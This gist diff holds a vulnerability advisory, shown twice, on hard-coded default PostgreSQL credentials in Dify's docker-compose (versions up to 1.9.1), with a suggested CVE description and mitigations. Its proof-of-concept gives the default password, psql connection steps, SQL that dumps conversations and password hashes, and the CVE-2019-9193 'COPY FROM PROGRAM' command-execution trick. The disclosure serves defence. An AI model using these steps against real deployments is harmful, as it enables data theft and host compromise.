Cristliu · September 30, 2025 17:56
diff --git a/gistfile1.txt b/gistfile1.txt
 Vulnerability Overview

 Vendor: Dify (langgenius/dify)
 Product: Dify - Open-source LLM application development platform
 Affected Versions: <= v1.9.1
 Vulnerability Type: CWE-798 (Use of Hard-coded Credentials)

 1. Attack Type:
 Remote
 Local (for internal environments with exposed services)

 ---

 2. Impact
 - Code Execution: Due to CVE-2019-9193 (PostgreSQL vulnerability), an attacker can execute arbitrary commands, potentially gaining full control over the system where the service is hosted.
 - Information Disclosure: Attackers can gain unauthorized access to sensitive data, including users' interactions with the AI system and other sensitive records stored in the database.
 - Escalation of Privileges: The use of default credentials (PGUSER and POSTGRES_PASSWORD) allows attackers to gain administrative privileges in the PostgreSQL database, potentially leading to full system compromise.

 ---

 3. Affected Component(s)

 - docker/docker-compose.yaml (PostgreSQL service configuration)
 - Default database configuration in deployment setup
 - PostgreSQL service (db container)

 Specific code location:
 # docker/docker-compose.yaml - PostgreSQL database section
 services:
  db:
    environment:
      PGUSER: ${PGUSER:-postgres}
      POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-difyai123456}

 ---

 4. Attack Vector(s)
 - Internal Network: An attacker with access to the internal network can connect to the exposed PostgreSQL database using the default username (postgres) and password (difyai123456) to access sensitive data stored in the database.
 - External Network: An attacker can use network reconnaissance tools such as FOFA to discover Dify instances with exposed PostgreSQL service ports (5432) and attempt to connect using default credentials. Once connected, the attacker can retrieve all stored data, including user interactions and configuration details.
 - Privilege Escalation via PostgreSQL CVE-2019-9193: If the PostgreSQL service is vulnerable to CVE-2019-9193, an attacker may be able to escalate privileges by executing arbitrary commands on the host system via the database connection.

 ---

 5. Suggested Description for CVE:

 The Dify platform, a widely used service for deploying large language models (LLMs), has a critical vulnerability related to the PostgreSQL database configuration.
 A hard-coded default credential vulnerability exists in the Dify's PostgreSQL database configuration.
 The docker-compose.yaml file specifies default credentials (username: postgres, password: difyai123456) that remain unchanged in many production deployments.
 When administrators expose the PostgreSQL service port (5432) for team collaboration purposes, these default credentials become exploitable by unauthorized parties who can access the network.

 Since Dify is open-source, the default credentials are publicly known. Attackers can:

 (1) Information Disclosure: Access all database contents including user conversations, API keys, workspace data, and administrative credentials
 (2) Privilege Escalation: Gain administrative access to the Dify platform by extracting admin credentials
 (3) Code Execution (Chained): Leverage PostgreSQL vulnerabilities (e.g., CVE-2019-9193) to execute arbitrary commands on the host system with database privileges

 This vulnerability affects both internal network scenarios (privilege escalation by low-privileged users) and external attack scenarios (remote unauthorized access).

 ---

 6. Proof of Concept (PoC)
 Environment Setup:
 (1) Deploy Dify v1.9.1 using official docker-compose
 (2) Add port mapping to expose PostgreSQL:

 yaml# Modified docker-compose.yaml
 db:
  image: postgres:15-alpine
  ports:
    - "5432:5432"  # Added this line
  environment:
    PGUSER: ${PGUSER:-postgres}
    POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-difyai123456}

 Exploitation Steps:

 Test 1: Remote Connection

 bash# From attacker machine
 $ psql -h 192.**.**.100 -p 5432 -U postgres -d dify
 Password for user postgres: difyai123456

 psql (15.x)
 Type "help" for help.

 dify=# \dt
          List of relations
 Schema |       Name        | Type  |  Owner   
 --------+-------------------+-------+----------
 public | accounts          | table | postgres
 public | messages          | table | postgres
 public | api_keys          | table | postgres
 ...

 dify=# SELECT email, password FROM accounts WHERE role = 'admin';

 Test 2: Data Exfiltration

 sql-- Extract all AI conversation history
 COPY (SELECT * FROM messages) TO STDOUT CSV HEADER;

 -- Extract sensitive credentials
 SELECT id, email, password_hash FROM accounts;

 Test 3: Privilege Escalation via CVE-2019-9193

 sql-- Create malicious table and execute commands
 DROP TABLE IF EXISTS cmd_exec;
 CREATE TABLE cmd_exec(cmd_output text);
 COPY cmd_exec FROM PROGRAM 'id';
 SELECT * FROM cmd_exec;

 ---

 7. Affected Versions
 <=v1.9.1 are confirmed vulnerable when deployed with default configuration.

 ---

 8. Recommended Mitigation
 Immediate: Force password change on first deployment
 Remove hard-coded defaults from docker-compose.yaml
 Add security warning in documentation about exposing PostgreSQL port
 Implement: Automatic generation of random credentials during installation
 Network security: Do not expose PostgreSQL port to untrusted networks

 ---

 9. Reporter
 National University of Defense Technology: Zhihuang Liu, Ling Hu, Yonghao Tang, Tongqing Zhou, Zhiping Cai & Hunan University: Fang Liu
 Contact: herecristliu@gmail.com, lzhliu@nudt.edu.cn
	Vulnerability Overview

	Vendor: Dify (langgenius/dify)
	Product: Dify - Open-source LLM application development platform
	Affected Versions: <= v1.9.1
	Vulnerability Type: CWE-798 (Use of Hard-coded Credentials)

	1. Attack Type:
	Remote
	Local (for internal environments with exposed services)

	---

	2. Impact
	- Code Execution: Due to CVE-2019-9193 (PostgreSQL vulnerability), an attacker can execute arbitrary commands, potentially gaining full control over the system where the service is hosted.
	- Information Disclosure: Attackers can gain unauthorized access to sensitive data, including users' interactions with the AI system and other sensitive records stored in the database.
	- Escalation of Privileges: The use of default credentials (PGUSER and POSTGRES_PASSWORD) allows attackers to gain administrative privileges in the PostgreSQL database, potentially leading to full system compromise.

	---

	3. Affected Component(s)

	- docker/docker-compose.yaml (PostgreSQL service configuration)
	- Default database configuration in deployment setup
	- PostgreSQL service (db container)

	Specific code location:
	# docker/docker-compose.yaml - PostgreSQL database section
	services:
	db:
	environment:
	PGUSER: ${PGUSER:-postgres}
	POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-difyai123456}

	---

	4. Attack Vector(s)
	- Internal Network: An attacker with access to the internal network can connect to the exposed PostgreSQL database using the default username (postgres) and password (difyai123456) to access sensitive data stored in the database.
	- External Network: An attacker can use network reconnaissance tools such as FOFA to discover Dify instances with exposed PostgreSQL service ports (5432) and attempt to connect using default credentials. Once connected, the attacker can retrieve all stored data, including user interactions and configuration details.
	- Privilege Escalation via PostgreSQL CVE-2019-9193: If the PostgreSQL service is vulnerable to CVE-2019-9193, an attacker may be able to escalate privileges by executing arbitrary commands on the host system via the database connection.

	---

	5. Suggested Description for CVE:

	The Dify platform, a widely used service for deploying large language models (LLMs), has a critical vulnerability related to the PostgreSQL database configuration.
	A hard-coded default credential vulnerability exists in the Dify's PostgreSQL database configuration.
	The docker-compose.yaml file specifies default credentials (username: postgres, password: difyai123456) that remain unchanged in many production deployments.
	When administrators expose the PostgreSQL service port (5432) for team collaboration purposes, these default credentials become exploitable by unauthorized parties who can access the network.

	Since Dify is open-source, the default credentials are publicly known. Attackers can:

	(1) Information Disclosure: Access all database contents including user conversations, API keys, workspace data, and administrative credentials
	(2) Privilege Escalation: Gain administrative access to the Dify platform by extracting admin credentials
	(3) Code Execution (Chained): Leverage PostgreSQL vulnerabilities (e.g., CVE-2019-9193) to execute arbitrary commands on the host system with database privileges

	This vulnerability affects both internal network scenarios (privilege escalation by low-privileged users) and external attack scenarios (remote unauthorized access).

	---

	6. Proof of Concept (PoC)
	Environment Setup:
	(1) Deploy Dify v1.9.1 using official docker-compose
	(2) Add port mapping to expose PostgreSQL:

	yaml# Modified docker-compose.yaml
	db:
	image: postgres:15-alpine
	ports:
	- "5432:5432" # Added this line
	environment:
	PGUSER: ${PGUSER:-postgres}
	POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-difyai123456}

	Exploitation Steps:

	Test 1: Remote Connection

	bash# From attacker machine
	$ psql -h 192...100 -p 5432 -U postgres -d dify
	Password for user postgres: difyai123456

	psql (15.x)
	Type "help" for help.

	dify=# \dt
	List of relations
	Schema \| Name \| Type \| Owner
	--------+-------------------+-------+----------
	public \| accounts \| table \| postgres
	public \| messages \| table \| postgres
	public \| api_keys \| table \| postgres
	...

	dify=# SELECT email, password FROM accounts WHERE role = 'admin';

	Test 2: Data Exfiltration

	sql-- Extract all AI conversation history
	COPY (SELECT * FROM messages) TO STDOUT CSV HEADER;

	-- Extract sensitive credentials
	SELECT id, email, password_hash FROM accounts;

	Test 3: Privilege Escalation via CVE-2019-9193

	sql-- Create malicious table and execute commands
	DROP TABLE IF EXISTS cmd_exec;
	CREATE TABLE cmd_exec(cmd_output text);
	COPY cmd_exec FROM PROGRAM 'id';
	SELECT * FROM cmd_exec;

	---

	7. Affected Versions
	<=v1.9.1 are confirmed vulnerable when deployed with default configuration.

	---

	8. Recommended Mitigation
	Immediate: Force password change on first deployment
	Remove hard-coded defaults from docker-compose.yaml
	Add security warning in documentation about exposing PostgreSQL port
	Implement: Automatic generation of random credentials during installation
	Network security: Do not expose PostgreSQL port to untrusted networks

	---

	9. Reporter
	National University of Defense Technology: Zhihuang Liu, Ling Hu, Yonghao Tang, Tongqing Zhou, Zhiping Cai & Hunan University: Fang Liu
	Contact: herecristliu@gmail.com, lzhliu@nudt.edu.cn
No results found